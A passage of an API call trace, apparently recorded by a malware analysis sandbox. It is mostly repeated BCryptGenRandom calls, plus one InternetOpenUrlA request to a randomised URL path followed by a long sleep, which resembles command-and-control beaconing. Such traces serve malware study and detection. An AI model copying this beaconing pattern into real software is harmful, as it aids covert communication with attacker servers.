lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0268.042] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0268.042] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0268.042] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0268.042] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0268.043] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0268.043] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0268.043] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0268.043] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0268.043] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0268.043] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0268.043] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0268.043] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0268.043] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0268.044] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0268.044] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0268.044] GetProcessHeap () returned 0x440000 [0268.044] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x201) returned 0x472f30 [0268.044] lstrcpyA (in: lpString1=0x472f30, lpString2="\x81\x03" | out: lpString1="\x81\x03") returned="\x81\x03" [0268.044] lstrcatA (in: lpString1="\x81\x03", lpString2="/V091n9f1vlsca3gmwcuq0oi8cf7jywoq2Jkr2lkH3/smeDsc2qzmtT6sb3c0ekqv8mymx0kzje/" | out: lpString1="\x81\x03/V091n9f1vlsca3gmwcuq0oi8cf7jywoq2Jkr2lkH3/smeDsc2qzmtT6sb3c0ekqv8mymx0kzje/") returned="\x81\x03/V091n9f1vlsca3gmwcuq0oi8cf7jywoq2Jkr2lkH3/smeDsc2qzmtT6sb3c0ekqv8mymx0kzje/" [0268.044] GetProcAddress (hModule=0x7ffc51070000, lpProcName="InternetOpenUrlA") returned 0x7ffc5107e820 [0268.044] InternetOpenUrlA (hInternet=0xcc0004, lpszUrl="\x81\x03/V091n9f1vlsca3gmwcuq0oi8cf7jywoq2Jkr2lkH3/smeDsc2qzmtT6sb3c0ekqv8mymx0kzje/", lpszHeaders=0x0, dwHeadersLength=0x0, dwFlags=0x20c00000, dwContext=0x0) returned 0x0 [0268.044] GetProcessHeap () returned 0x440000 [0268.044] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x472f30 | out: hHeap=0x440000) returned 1 [0268.044] GetProcessHeap () returned 0x440000 [0268.044] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x3a1b3a0 | out: hHeap=0x440000) returned 1 [0268.044] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="EnterCriticalSection") returned 0x7ffc5f83e600 [0268.045] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="LeaveCriticalSection") returned 0x7ffc5f83eb00 [0268.045] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0268.045] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffe60, cbBuffer=0x4, dwFlags=0x2 | out: pbBuffer=0x46ffe60) returned 0x0 [0268.045] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="Sleep") returned 0x7ffc5eceb7b0 [0268.045] Sleep (dwMilliseconds=0x17a62) [0268.183] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0268.183] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffe90, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffe90) returned 0x0 [0268.183] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0268.183] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0268.183] GetProcessHeap () returned 0x440000 [0268.183] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0xc6) returned 0x4d5e20 [0268.184] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0268.184] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0268.184] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0268.184] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x4d5e21, cbBuffer=0x20, dwFlags=0x2 | out: pbBuffer=0x4d5e21) returned 0x0 [0268.184] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0268.184] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0268.184] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0268.184] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0268.185] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0268.185] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0268.185] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0268.185] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0268.185] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0268.185] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0268.186] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0268.186] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0268.186] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0268.186] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0268.186] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0268.186] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0268.187] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0268.187] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0268.187] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0268.187] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0268.187] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0268.187] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0268.187] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0268.187] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0268.188] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0268.188] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0268.188] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0268.188] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0268.188] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0268.189] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0268.189] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0268.189] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0268.189] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0268.189] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0268.189] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0268.189] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0268.190] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0268.190] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0268.190] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0268.190] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0268.190] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0268.190] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0268.190] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0268.190] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0268.191] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0268.191] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0268.191] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0268.191] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x4d5e41, cbBuffer=0x2b, dwFlags=0x2 | out: pbBuffer=0x4d5e41) returned 0x0 [0268.191] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0268.191] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0268.192] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0268.192] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0268.192] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0268.192] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0268.192] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0268.192] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0268.193] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0268.193] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0268.193] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0268.193] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0268.193] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0268.193] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0268.193] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0268.193] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0268.194] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0268.194] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0268.194] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0268.194] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0268.194] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0268.195] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0268.195] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0268.195] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0268.195] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0268.195] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0268.196] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0268.196] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0268.196] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0268.196] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0268.196] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0268.198] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0268.199] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0268.199] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0268.199] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0268.199] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0268.200] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0268.200] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0268.200] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0268.200] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0268.200] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0268.200] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0268.201] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0268.201] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0268.201] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0268.201] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0268.201] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0268.202] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0268.202] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0268.202] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0268.202] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0268.202] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0268.202] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0268.203] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0268.203] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0268.203] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0268.203] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0268.203] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0268.203] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0268.204] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0268.204] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0268.204] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x4d5e6c, cbBuffer=0x1b, dwFlags=0x2 | out: pbBuffer=0x4d5e6c) returned 0x0 [0268.204] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0268.204] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0268.205] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0268.205] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0268.205] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0268.205] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0268.205] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0268.205] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0268.205] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0268.206] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0268.206] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0268.206] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0268.206] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0268.206] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0268.206] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0268.206] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0268.207] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0268.207] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0268.207] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0268.207] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0268.207] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0268.442] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0268.443] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0268.443] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0268.443] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0268.443] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0268.443] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0268.443] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0268.443] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0268.444] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0268.444] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0268.444] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0268.445] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0268.445] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0268.445] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0268.445] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0268.445] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0268.445] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0268.445] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0268.445] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x4d5e87, cbBuffer=0x25, dwFlags=0x2 | out: pbBuffer=0x4d5e87) returned 0x0 [0268.446] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0268.446] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, 